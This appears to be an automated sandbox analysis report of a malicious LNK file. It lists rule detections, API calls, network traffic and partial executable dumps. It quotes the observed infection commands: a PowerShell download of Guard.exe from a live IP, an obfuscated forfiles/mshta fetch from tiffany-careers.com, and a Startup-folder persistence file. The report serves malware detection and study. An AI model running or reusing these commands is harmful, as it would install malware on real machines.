Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4308, TargetFilename: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\PefjSkkhb.exe" , ParentImage: C:\Users\user\AppData\Roaming\PefjSkkhb.exe, ParentProcessId: 7724, ParentProcessName: PefjSkkhb.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7812, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 4424, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 5524, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/ghep2, ProcessId: 984, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5300, ProcessName: svchost.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T09:13:05.458082+010028033053Unknown Traffic192.168.2.549707147.45.49.15580TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1]ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeReversingLabs: Detection: 31%
Source: duyba.lnk.download.lnkVirustotal: Detection: 20%Perma Link
Source: duyba.lnk.download.lnkReversingLabs: Detection: 15%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.2270225640.000001D8EE742000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2281480259.000001D8F2724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2731000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277177873.000001D8F2721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_00007FF7C0ECC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA350
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,11_2_00007FF7C0EDA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED6428 FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7C0ED6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_00007FF7C0EDA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0E92F50 FindFirstFileExW,11_2_00007FF7C0E92F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED71F4 FindFirstFileW,FindClose,11_2_00007FF7C0ED71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ED72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_00007FF7C0ED72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0ECBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00007FF7C0ECBC70
Source: C:\Users\Public\Guard.exeCode function: 20_2_00714005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00714005
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_0071494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD14 FindFirstFileW,FindClose,20_2_0071CD14
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_0071CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0071F735
Source: C:\Users\Public\Guard.exeCode function: 20_2_0071FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_0071FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00713CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00713CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_002F494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD14 FindFirstFileW,FindClose,24_2_002FCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_002FCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_002FF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002FFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_002FFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_002F3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_002F3CE2
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKetag: "108a00-675eb102-2534d;;;"last-modified: Sun, 15 Dec 2024 10:35:46 GMTcontent-type: application/x-executablecontent-length: 1083904accept-ranges: bytesdate: Wed, 18 Dec 2024 08:13:05 GMTserver: LiteSpeedconnection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47 b8 2b 50 d0 b8 2a 50 47 b8 8e 39 45 b9 2a 50 47 b8 52 69 63 68 2b 50 47 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 e4 af 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 10 00 34 0b 00 00 52 05 00 00 00 00 00 9c 54 02 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 11 00 00 04 00 00 71 52 11 00 02 00 60 81 00 00 40 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 5c 0e 00 7c 01 00 00 00 b0 0f 00 f8 40 01 00 00 40 0f 00 48 6f 00 00 00 00 00 00 00 00 00 00 00 00 11 00 74 0a 00 00 50 70 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9a 0d 00 28 00 00 00 70 70 0c 00 00 01 00 00 00 00 00 00 00 00 00 00 00 50 0b 00 38 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 33 0b 00 00 10 00 00 00 34 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 42 03 00 00 50 0b 00 00 44 03 00 00 38 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 91 00 00 00 a0 0e 00 00 50 00 00 00 7c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 48 6f 00 00 00 40 0f 00 00 70 00 00 00 cc 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 40 01 00 00 b0 0f 00 00 42 01 00 00 3c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 74 0a 00 00 00 00 11 00 00 0c 00 00 00 7e 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 08:13:12 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 15 Dec 2024 10:29:42 GMTETag: "da2a8-6294c8abc9816"Accept-Ranges: bytesContent-Length: 893608Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0d 00 00 04 00 00 15 cd 0d 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc d0 0b 00 7c 01 00 00 00 90 0c 00 50 d7 00 00 00 00 00 00 00 00 00 00 00 86 0d 00 a8 1c 00 00 00 70 0d 00 ac 71 00 00 90 3b 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 5b 0a 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 84 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b1 e7 08 00 00 10 00 00 00 e8 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 8e fd 02 00 00 00 09 00 00 fe 02 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 8f 00 00 00 00 0c 00 00 52 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 d7 00 00 00 90 0c 00 00 d8 00 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 71 00 00 00 70 0d 00 00 72 00 00 00 14 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global trafficHTTP traffic detected: GET /Marketing.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 147.45.49.155:80
Source: global trafficHTTP traffic detected: GET /ghep2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: unknownTCP traffic detected without corresponding DNS query: 139.99.188.124
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 11_2_00007FF7C0EDE87C InternetReadFile,11_2_00007FF7C0EDE87C
Source: global trafficHTTP traffic detected: GET /ghep2 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Marketing.pdf HTTP/1.1Host: tiffany-careers.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /PefjSkkhb.exe HTTP/1.1Host: tiffany-careers.com
Source: global trafficHTTP traffic detected: GET /kiiMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QWCheljD.txt HTTP/1.1Host: 139.99.188.124Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tiffany-careers.com
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: powershell.exe, 00000012.00000002.2304075109.00000130E1558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2304075109.00000130E24AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.188.124
